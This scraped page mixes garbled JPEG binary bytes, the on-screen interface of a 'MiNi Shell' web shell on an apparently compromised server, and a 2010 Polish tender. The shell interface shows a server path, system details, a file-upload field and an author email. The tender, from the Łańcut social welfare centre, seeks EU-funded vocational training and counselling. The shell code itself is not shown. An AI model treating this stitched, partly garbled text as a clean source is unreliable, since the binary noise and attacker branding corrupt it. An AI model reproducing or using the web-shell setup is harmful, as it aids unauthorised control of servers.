JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100303/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100303/47951-N-2010.html

<p class="kh_header"><b>Łańcut: Organizację  i przeprowadzenie szkoleń w ramach projektu Czas na aktywność 
w mieście Łańcucie relizowanego przez Miejski Ośrodek Pomocy Społecznej w Łańcucie - współfinansowany z Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 47951 - 2010; data zamieszczenia: 03.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Łańcucie , ul. Józefa Piłsudskiego 9, 37-100 Łańcut, woj. podkarpackie, tel. 0-17 2253325, faks 0-17 2256167.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizację  i przeprowadzenie szkoleń w ramach projektu Czas na aktywność 
w mieście Łańcucie relizowanego przez Miejski Ośrodek Pomocy Społecznej w Łańcucie - współfinansowany z Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Organizacja  i przeprowadzenie szkoleń w ramach projektu Czas na aktywność w mieście Łańcucie relizowanego przez Miejski Ośrodek Pomocy Społecznej w Łańcucie współfinansowany z Europejskiego Funduszu Społecznego.Celem głównym projektu jest podniesienie statusu zawodowego, uzupełnienie i dostosowanie kwalifikacji i umiejętności zwodowych i społecznych u 20 klientów MOPS poprzez przygotowanie ich do wejścia lub powrotu na rynek pracy.Projekt skierowany jest do 20 osób, w tym 16 kobiet i 4 mężczyzn zamieszkałych na terenie m. Łańcuta. Przedmiot zamówienia obejmuje:

1. Trening kompetencji umiejętności społecznych
   Miejsce szkolenia:  Miasto Łańcut
   Liczba uczestników:  20 osób
   Ilość godzin: 2 cykle razem 120 godzin dydaktycznych. Zajęcia mają być     
   prowadzone przez trenera dla 2 grup; 
   Instrument ten obejmuje: budowanie grupy, dochodzenie do postawy 
   aktywnej, komunikację interpersonalna, trening asertywności, radzenie sobie w trudnej sytuacji, nauczenie pozytywnego myślenia, uczestnictwo w grupach, samopomoc.Termin realizacji: kwiecień - maj 2010
2. Szkolenie: fryzjer
    Miejsce szkolenia: Miasto Łańcut
    Liczba uczestników: 3 osoby
    Ilość godzin:  170  godzin  dydaktycznych
    Program szkolenia obejmuje: pielęgnację włosów, strzyżenie i czeseanie włosów (koki i fryzury ślubne rodzaje strzyżeń) trwała ondulacja- wpływ zabiegu na włosy, proces trwałej ondulacji, technika wykonywania zabiegu, farbowanie włosów/ balejage,wizaż-barwy, stylizacja fryzury. 
   Celem szkolenia jest przygotowanie uczestników do wykonywania zawodu: fryzjer.
   Termin realizacji: wrzesień  - październik 2010


2. Szkolenie: opiekun osób starszych 
    Miejsce szkolenia: Miasto Łańcut
    Liczba uczestników: 6 osób
    Ilość godzin:  100 godzin dydaktycznych 
Program szkolenia obejmuje: elementy psychologii, podstawy anatomii i fizjologii, wybrane zagadnienia rehabilitacji, podstawy higieny i pielęgnacji, publiczna służba zdrowia oraz system pomocy społecznej, organizacja pracy własnej oraz zasady bhp, etyka w zawodzie opiekuna osób starszych, pielęgnacja osób starszych, pierwsza pomoc.
Celem szkolenia jest przygotowanie uczestników do wykonywania zawodu: opiekun osób starszych .
Termin realizacji: wrzesień - październik 2010 r.

3. Szkolenie: Kasjer -handlowiec: fakturowanie, gospodarka magazynowa.
    Program szkolenia obejmuje: technologia i organizacja prac magazynowych, zapsy magazynowe,budowle    
   magazynowe i wyposażenie magazynu, obsługa programu do fakturowania i obsługa 
   programu magazynowego, obsługa kas  fiskalnych-rodzaje urządzeń fiskalnych, podmiotowy i 
   przedmiotowy obowiązek stosowania kas     fiskalnych,użycie kas fiskalnych, raporty kas fiskalnych, 
   prawne aspekty sprzedaży, fakturowanie     i dokumentowanie sprzedaży, zasady identyfikacji fałszywych 
   znaków pieniężnych, techniki sprzedaży,  profesjonalna obsługa klienta, aspekty higieniczno - sanitarne, 
   wiedza o konsumencie, organizacja pracy w sklepie.

    Miejsce szkolenia: Miasto Łańcut
    Liczba uczestników:          3 osóby
    Ilość godzin: 120  godzin  dydaktycznych
    Termin realizacji: wrzesień - październik 2010
    Celem szkolenia jest opanowanie przez uczestników czynności niezbędnych do wykonywania zawodu:
    sprzedawcy, kasjera, handlowca.

4. Szkolenie: kucharz małej gastrionomii 
    Miejsce szkolenia: Miasto Łańcut
    Liczba uczestników: 2 osoby
    Ilość godzin:  280  godzin  dydaktycznych
    Program szkolenia obejmuje: organizacja pracy kucharza, układanie menu, zabezpieczanie surowców, wyrobów przed zepsuciem, przygotowanie potraw, zakąsek i deserów, zastosowanie nowoczesnych urządzeń pod kątem utrzymania wysokiego standardu potraw, dekoracja stołów, prezentacja potraw.  
Celem szkolenia jest przygotowanie uczestników do wykonywania zawodu: 
    kucharz.
    Termin realizacji: wrzesień - październik 2010

5. Szkolenie: technolog robót wykończeniowych
    Miejsce szkolenia: Miasto Łańcut
    Liczba uczestników: 3  osoby
    Ilość godzin: 150 godzin  dydaktycznych
Program szkolenia obejmuje: montaż elementów kartonowo-gipsowych, montaż elementów z tworzyw sztucznych, wykonywanie gładzi gipsowej, izolacji budowlanych,malowanie, tapetowanie i prace dekoratorskie, wykonywanie okładzin ściennych oraz posadzek z płytek ceramicznych, wykładzin i paneli. Celem szkolenia jest przygotowanie uczestników do wykonywania zawodu: kucharz.
Termin realizacji: wrzesień - październik 2010

6. Szkolenie: magazynier-obsługa programu magazynowo-hurtowego + wózki jezdniowe
    Program szkolenia obejmuje: obsługa magazynowego programu komputerowego, typy stosowanych wózków jezdniowych, budowa wózka, czynności kierowcy przy obsłudze wózków pod podjęciem pracy, w czasie pracy oraz po pracy z wózkami, bezpieczna wymiana butli w wózkach wyposażonych w te urządzenia, wiadomości o dozorze technicznym, wiadomości z zakresu ładunkoznawstwa, wiadomości z zakresu bhp, praktyczna nauka jazdy i manewrowania osprzętem wózków.

    Miejsce szkolenia: Miasto Łańcut
    Liczba uczestników:          3 osóby
    Ilość godzin: 110  godzin  dydaktycznych
    Termin realizacji: wrzesień - październik
    Celem szkolenia jest opanowanie przez uczestników czynności niezbędnych do wykonywania zawodu:
 
7. Szkolenie: kurs komputerowy
    Program szkolenia obejmuje: użytkowanie komputerów, edytor tekstu Microsoft Word, arkusz kalkulacyjny Micropsoft Excel, grafika prezentacyjna Microsoft Power Point, korzystanie z internetu i poczty elektronicznej.

    Miejsce szkolenia: Miasto Łańcut
    Liczba uczestników:          2 osóby
    Ilość godzin: 50 godzin  dydaktycznych
    Termin realizacji: wrzesień - październik 2010
    Celem szkolenia jest opanowanie przez uczestników czynności niezbędnych do obsługi komputera.
    
Szkolenia: pkt 1-7
Zajęcia szkoleniowe mają odbywać się od poniedziałku do piątku. Maksymalna ilość godz lekcyjnych - 7 godz. dziennie zapewniając przynajmniej jedną przerwę na posiłek.
Wykonawca ma przedłożyć harmonogram szkoleń, szczegółowy program szkoleń, określić formy, metody szkolenia/nauki, przewidzianą ilość godzin zajęć teoretycznych i praktycznych.
Wykonawca ponosi wszelkie koszty związane z realizacją zamówienia z uwzględniem obowiązujących 
w tym zakresie przepisów prawa. 
Wykonawca zapewnia: sale szkoleniowe, sprzęt dydaktyczny, materiały szkoleniowe dla uczestników, warunki w czasie szkoleń zgodne z przepisami BHP, wyżywienie: śniadanie (kanapki), ciastka, kawa, herbata,ciepły posiłek (obiad składających się z 2 dań).
W sali szkoleniowej należy umieścić logo EFS.
Wykonawca pokrywa koszty niezbędnych badań lekarskich uczestników danego szkolenia (wyrobienie książeczki zdrowia) jeżeli specyfika kursu tego wymaga, ubezpieczenia uczestników szkolenia od następstw nieszczęśliwych wypadków (podczas szkolenia, w drodze na szkolenie i ze szkolenia).
Wykonawca zapewni, że program szkoleń zawodowych, przeprowadzenie szkolenia musi odbyć się zgodnie z obowiązującymi przepisami prawa(m.in. Rozporządzenie Ministra Edukacji Narodowej oraz Ministra Pracy i Polityki Socjalnej z dnia 12 października 1993 r. w sprawie zasad warunków podnoszenia kwalifikacji zawodowych i wykształcenia ogólnego dorosłych (Dz. U. z 1993 r.  Nr 103, poz. 472 z późn. zm). Szkolenie ma zakończyć się oceną zdobytych umiejętności oraz wydaniem stosownego dokumentu: certyfikatu, dyplomu lub zaświadczenia o ukończeniu szkolenia zgodnie z obowiązującymi w tym zakresie przepisami (Rozporządzenie Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania 
i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych Dz. U. z 2006 r. Nr 31 poz. 216). Wydane certyfikaty muszą zawerać logo Europejskiego Funduszu Społecznego oraz informację, że projekty był współfinansowany ze środków EFS.
Wykonawca ma dostarczyć Zamawiającemu pełną dokumentację szkoleń tj. m.in. kserokopie dziennika zajęć edukacyjnych zawierającego tematy zajeć i wymiar godzin oraz listę obecności z własnoręcznymi podpisami uczestników szkoleń, potwierdzenia odbioru materiałów szkoleniowych; kserokopie zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie określonych kwalifikacji, kserokopie rejestru wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji, kserokopię protokółu egzaminacyjnego w przypadku kursu kończącego się egzaminem, kopię ankiet oceny szkolenia.

8. Poradnictwo specjalistyczne w tym  wsparcie specjalistyczne: kwestie uzależnień, zdrowego tybu 
     życia, interwencji kryzysowych, mediacji rodzinnych.

1. Grupowe   - 2 spotkania tematyczne w ilości 4 godz. dydaktycznych każde, połączone z prezentacjami,    
    które poprowadzą specjaliści z zakresu promocji zdrowia, uzależnień, zdrowgo trybu życia, interwencji 
    kryzysowych i mediacji rodzinnych: maj - czerwiec 2010
2) poradnictwo specjalistyczne indywidualne dla 20 osób w  ilości 1 godz. (60 min.) na osobę: np.  
    psycholog, terapeuta, mediator - kwiecień - listopad 2010
3) zwrócenie uwagi na potrzebę zorganizowania uczestnictwa w grupach samopomocowych, grupach 
    wsparcia: sierpień - październik 2010
                  
9. Doradca zawodowy - doradztwo indywidualne dla 20 osób w ilości 2 godz. na osobę (1 godz. = 60 min.)
    Indywidualne konsultacje, w tym diagnoza możliwości zawodowych: rozpoznanie potencjału zawodowego, urealnienie samooceny i rozwinięcie wglądu we własne mozliwości, rozpoznanie indywidualnych obszarów trudności, kwalifikacje zawodowe wymagane na konkretnych stanowiskach pracy, indywidualny plan działania - utwierdzenie podjętej decyzji przez uczestnika projektu dotyczącej ścieżki szkoleń zawodowych oraz pszyszłej pracy , analiza potrzeb klienta, samodzielne opracowanie przez uczestnika projektu aplikacji zawodowych - tematyka zostanie dosotosowana do indywidualnych potrzeb uczestników, zależeć będzie od ich oczekiwań, poziomu wiedzy i umiejętności. Doradztwo
Termin: czerwiec  2010.
10. Porady prawnika - porady indywidualne w ilości 5 godz. (1 godz. = 60 min.).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających polegających na powtórzeniu tego samego rodzaju zamówień.Wielkość zamówień uzupełniających do 50 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 80.53.00.00-8, 80.56.10.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 2000 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zaświadczenie - aktualne o wpisie instytucji szkoleniowej do rejestru instytucji szkoleniowych.
Zamawiający oceni spełnienie tego warunku na podstawie złożonego zaświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony ,jeżeli Wykonawca wykaże ,że w okresie  ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okresprowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 usługi szkolenia o wartości co najmniej 40.000 każda w tym min. 1 współfinansowana z EFS oraz załączą dokumenty potwierdzające, że te usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie tego warunku na podstawie treści oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony ,jeżeli Wykonawca wykaże, że dysponuje  osobami posiadającymi kwalifikacje zawodowe oraz doświadczenie i wykształcenie  niezbędne do wykonania przedmiotu zamówienia (psycholog, prawnik, trener, doradca zawodowy)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie tego warunku na podstawie złożonego zaświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz zakresu zamówienia, który będzie realizowany przez Podwykonawców (jeżeli wykonawca przewiduje zaangażowanie podwykonawców do wykonania zamówienia).
Szczegółowa kalkulację - kosztorys ofertowy. Harmonogram, program szkolenia. Dokument - wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Stosownie do art. 144 ustawy Prawo zamówień publicznych zamawiający zastrzega możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której wybrano wykonawcę polegającej na zmianie terminu realizacji zamówienia z przyczyn niezależnych od Zamawiającego jak również Wykonawcy - z powodu nagłej i znacznej ilości rezygnacji przez uczestników szkolenia, zmiany kluczowego personelu Wykonawcy - za uprzednią zagodą zamawiającego wyrażoną na piśmie, jeżeli wynika z przyczyn niezależnych od Wykonawcy (np. zdarzenia losowe: choroba, wypadek itp.); wynagrodzenia w przypadku zmniejszenia ilości usług przez Zamawiającego bez zapłaty dodatkowych kwot oraz jeżeli nastąpi zmiana powszechnie obowiązujących przepisówprawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,
Warunki dokonywania zmian postanowień umowy: inicjowanie zmian na wniosek wykonawcy lub zamawiającego, uzasadnienie zmiany prawidłową realizacją przedmiotu umowy, forma pisemna pod rygorem nieważności w formie aneksu do umów</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopslancut.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Łańcucie, ul. Piłsudskiego 9, 37-100 Łańcut, pok. 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.03.2010 godzina 14:30, miejsce: Miejski Ośrodek Pomocy Społecznej w Łańcucie, ul. Piłsudskiego 9, 37-100 Łańcut, pok. 22.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy Miejskiego Ośrodka Pomocy Społecznej w Łańcucie pn. Czas na aktywność w mieście Łańcut realizowany jest w ramach Priorytetu VII PO KL Promocja Integracji Społecznej Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji Poddziałanie 7.1.1 Rozwój i upowszechnienie aktywnej integracji przez ośrodki aktywnej integracji wpółfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com